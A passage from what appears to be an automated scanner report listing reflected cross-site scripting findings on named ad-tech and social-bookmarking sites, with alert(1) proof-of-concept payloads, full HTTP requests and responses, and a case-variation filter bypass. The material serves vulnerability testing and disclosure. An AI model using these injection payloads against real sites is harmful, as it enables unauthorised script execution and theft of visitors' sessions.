Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:44 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=BD560CBA29D5FF2BCD7C9BBADEAE5064; Path=/
Content-Length: 2235
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:44 GMT
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title>
   </head>
   <body>

...[SNIP]...
_setCustomVar(5,"Category",'Technology',3);    
                       globalGaTracker._trackPageview("/homePage");        
               } catch(err) {}
               
               
               try{
                   adChannelGaTracker = _gat._getTracker('UA-11780962-106811c';alert(1)//93742b54adf');
   
                   adChannelGaTracker._setReferrerOverride(''); //required since an iframe's referrer is not the same as the parent page's
                   adChannelGaTracker._setDomainName(rootDomain);
                   adChannel
...[SNIP]...

4.104. http://static.wetpaint.com/staticComponent/iframe/track [siteCat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /staticComponent/iframe/track

Issue detail

The value of the siteCat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f59d8'%3balert(1)//f17e3fe8edb was submitted in the siteCat parameter. This input was echoed as f59d8';alert(1)//f17e3fe8edb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technologyf59d8'%3balert(1)//f17e3fe8edb&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:51 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=FE6F1B1277DF20F3DAF73CAFC657E9B3; Path=/
Content-Length: 2269
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:51 GMT
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title>
   </head>
   <body>

...[SNIP]...
ounter],1)        
                   globalGaTracker._setCustomVar(3,"MultiSiteVisits",1,2);        
                   globalGaTracker._setCustomVar(4,"SiteName",'htcwiki',3);    
                   globalGaTracker._setCustomVar(5,"Category",'Technologyf59d8';alert(1)//f17e3fe8edb',3);    
                       globalGaTracker._trackPageview("/homePage");        
               } catch(err) {}
               
               
               try{
                   adChannelGaTracker = _gat._getTracker('UA-11780962-10');
   
                   adChannelGaTracker._setRe
...[SNIP]...

4.105. http://static.wetpaint.com/staticComponent/iframe/track [siteName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /staticComponent/iframe/track

Issue detail

The value of the siteName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 779b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>41504730d2c was submitted in the siteName parameter. This input was echoed as 779b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>41504730d2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki779b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>41504730d2c&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:51 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=DA229296C73FE646FDCCE50BBF755E20; Path=/
Content-Length: 2310
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:51 GMT
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title>
   </head>
   <body>

...[SNIP]...
               //globalGaTracker._setCustomVar(2,"Contribution",[contributionCounter],1)        
                   globalGaTracker._setCustomVar(3,"MultiSiteVisits",1,2);        
                   globalGaTracker._setCustomVar(4,"SiteName",'htcwiki779b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>41504730d2c',3);    
                   globalGaTracker._setCustomVar(5,"Category",'Technology',3);    
                       globalGaTracker._trackPageview("/homePage");        
               } catch(err) {}
               
               
               try{
                   adChannelGaTracker = _ga
...[SNIP]...

4.106. http://static.wetpaint.com/staticComponent/iframe/track [sitesCount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /staticComponent/iframe/track

Issue detail

The value of the sitesCount request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3b06f%3balert(1)//2503310a12c was submitted in the sitesCount parameter. This input was echoed as 3b06f;alert(1)//2503310a12c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=13b06f%3balert(1)//2503310a12c&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:52 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=E1FCA5C2375BFF42E571DC325636DE6B; Path=/
Content-Length: 2261
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:52 GMT
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title>
   </head>
   <body>

...[SNIP]...
setCustomVar(1,"MemberData",'N__anonymous__-__-',1);                                    
                   //globalGaTracker._setCustomVar(2,"Contribution",[contributionCounter],1)        
                   globalGaTracker._setCustomVar(3,"MultiSiteVisits",13b06f;alert(1)//2503310a12c,2);        
                   globalGaTracker._setCustomVar(4,"SiteName",'htcwiki',3);    
                   globalGaTracker._setCustomVar(5,"Category",'Technology',3);    
                       globalGaTracker._trackPageview("/homePage");        
               } ca
...[SNIP]...

4.107. http://static.wetpaint.com/staticComponent/iframe/track [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /staticComponent/iframe/track

Issue detail

The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload 1ace3</title><script>alert(1)</script>ae207730a4d was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki1ace3</title><script>alert(1)</script>ae207730a4d&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:53 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=CE120C471FB90B16FE35CF6CDEA6164D; Path=/
Content-Length: 2257
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:53 GMT
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>HTC Smartphone Wiki - HTC Smartphone Wiki1ace3</title><script>alert(1)</script>ae207730a4d</title>
...[SNIP]...

4.108. http://static.wetpaint.com/staticComponent/iframe/track [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /staticComponent/iframe/track

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 267a4"%3balert(1)//ec0110e87b was submitted in the url parameter. This input was echoed as 267a4";alert(1)//ec0110e87b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F267a4"%3balert(1)//ec0110e87b HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:53 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=8EF5AF1534C8D16594D2F61F4FAA440D; Path=/
Content-Length: 2235
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:53 GMT
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title>
   </head>
   <body>

...[SNIP]...
iSiteVisits",1,2);        
                   adChannelGaTracker._setCustomVar(4,"SiteName",'htcwiki',3);    
                   adChannelGaTracker._setCustomVar(5,"Category",'Technology',3);    
                       adChannelGaTracker._trackPageview("/267a4";alert(1)//ec0110e87b");
                   
               } catch(err) {}
           })();
       
       </script>
...[SNIP]...

4.109. http://um.adpredictive.com/amumatch [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.adpredictive.com
Path:   /amumatch

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 646be'%3balert(1)//7deaafb62b9 was submitted in the admeld_adprovider_id parameter. This input was echoed as 646be';alert(1)//7deaafb62b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /amumatch?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=492646be'%3balert(1)//7deaafb62b9&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.adpredictive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Etag: "4e6914f5a459a13d9cc550f8d53636dec9a75463"
Server: TornadoServer/0.1
Set-Cookie: aml_uid=4d4d73f77a9d67330c4edc39; expires=Mon, 04 Feb 2013 15:59:51 GMT; Path=/
Content-Length: 175
Connection: keep-alive

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=492646be';alert(1)//7deaafb62b9&external_user_id=4d4d73f77a9d67330c4edc39"/>');

4.110. http://um.adpredictive.com/amumatch [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.adpredictive.com
Path:   /amumatch

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac9c7'%3balert(1)//432447c0514 was submitted in the admeld_callback parameter. This input was echoed as ac9c7';alert(1)//432447c0514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /amumatch?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=492&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchac9c7'%3balert(1)//432447c0514 HTTP/1.1
Host: um.adpredictive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Etag: "41ad9a395a9d608a2b0a9b798720c5fbd3e48a34"
Server: TornadoServer/0.1
Set-Cookie: aml_uid=4d4d73f97a9d67330c4edc95; expires=Mon, 04 Feb 2013 15:59:53 GMT; Path=/
Content-Length: 175
Connection: keep-alive

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchac9c7';alert(1)//432447c0514?admeld_adprovider_id=492&external_user_id=4d4d73f97a9d67330c4edc95"/>');

4.111. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92343"-alert(1)-"ebb68879ffc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php92343"-alert(1)-"ebb68879ffc HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 05 Feb 2011 15:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=if2gvf5uvdh7v1a1320leacm11; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1497
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php92343"-alert(1)-"ebb68879ffc";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.112. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7efed<script>alert(1)</script>ee0d16265bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php7efed<script>alert(1)</script>ee0d16265bf HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 05 Feb 2011 15:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=cs8kb2m53v021g3mbm8btac024; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1523
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php7efed<script>alert(1)</script>ee0d16265bf</strong>
...[SNIP]...

4.113. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19497"-alert(1)-"fe14a7cf82e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/19497"-alert(1)-"fe14a7cf82e HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/19497"-alert(1)-"fe14a7cf82e";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.114. http://www.addthis.com/bookmark.php [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29706"style%3d"x%3aexpression(alert(1))"3fa85094d5c was submitted in the v parameter. This input was echoed as 29706"style="x:expression(alert(1))"3fa85094d5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=2029706"style%3d"x%3aexpression(alert(1))"3fa85094d5c HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-2029706"style="x:expression(alert(1))"3fa85094d5c" />
...[SNIP]...

4.115. http://www.brinked.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brinked.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35421"><script>alert(1)</script>01d4208af54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?35421"><script>alert(1)</script>01d4208af54=1 HTTP/1.1
Host: www.brinked.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:11:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Set-Cookie: USESSID=b014a5f5303c9ef05950614cf3fe973d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: private
Set-Cookie: bbsessionhash=6b0905dbfbf10d2218725c7cb25f5a99; path=/; domain=.brinked.com; HttpOnly
Set-Cookie: bblastvisit=1296922280; expires=Sun, 05-Feb-2012 16:11:20 GMT; path=/; domain=.brinked.com
Set-Cookie: bblastactivity=0; expires=Sun, 05-Feb-2012 16:11:20 GMT; path=/; domain=.brinked.com
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38134

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<input type="hidden" name="url" value="../?35421"><script>alert(1)</script>01d4208af54=1" />
...[SNIP]...

4.116. http://www.brinked.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brinked.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0e8d</script><script>alert(1)</script>164da3fbd1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f0e8d</script><script>alert(1)</script>164da3fbd1b=1 HTTP/1.1
Host: www.brinked.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:11:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Set-Cookie: USESSID=bc5770e4d9533b6d9b89431625bc262e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: private
Set-Cookie: bbsessionhash=a82148471f18eec1815ce08dc0908369; path=/; domain=.brinked.com; HttpOnly
Set-Cookie: bblastvisit=1296922284; expires=Sun, 05-Feb-2012 16:11:24 GMT; path=/; domain=.brinked.com
Set-Cookie: bblastactivity=0; expires=Sun, 05-Feb-2012 16:11:24 GMT; path=/; domain=.brinked.com
